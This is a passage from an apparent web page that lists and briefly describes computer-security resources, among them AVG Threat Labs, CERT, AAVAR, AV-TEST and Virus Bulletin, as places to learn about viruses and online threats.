AVG.com – Learn about the top threats through AVG Threat Labs’ encyclopedia of viruses. Here you can learn more about specific viruses (e.g. Trojan Horse) while also seeing what threats have been detected today and what types of malware have been found.

Additional Resources and Organizations

CERT – If you want to stay up to date with all the latest developments in Internet security, including the most recent computer virus threats, this is your go-to place. Run as part of the Software Engineering Institute, CERT aims to provide cutting-edge information, advice, and training to continually develop and improve cybersecurity.

AAVAR.org – This nonprofit organization is based in Asia and is made up of a number of experts from all over the world. Their aim is to prevent the damage and spread of malicious malware while also raising the awareness of computer viruses to users across the globe.

Apple.com – For Mac users, this is a must-see resource as it provides you with added details on the type of safety that’s built into Macs. It’s also a good place to keep up to date with the latest advancements and whether there are any updates you need to do.

Microsoft.com – Here you can learn about Microsoft’s latest investments, what they’re doing to make their systems safe, and the security methods that are built into their systems. If you’re a business, you can also perform a security risk assessment, which helps you to see the cost implications of a security threat and what measures you need to take to protect your company.

AV-TEST.org – As an independent service provider, AV-TEST carries out research work which enables them to find the latest threats and analyze these before informing customers about their findings. Stay up to date with their latest tests through their website, narrowing your search down according to what device you want to search for – e.g. Android; Windows (business or personal); and MacOS.

VirusBulletin.com – With this publication you can find out the latest techniques, developments, and threats to online security, while also hearing the opinions of industry experts. Virus Bulletin also tests anti-malware software, so you can read about their certification schemes and what these involve.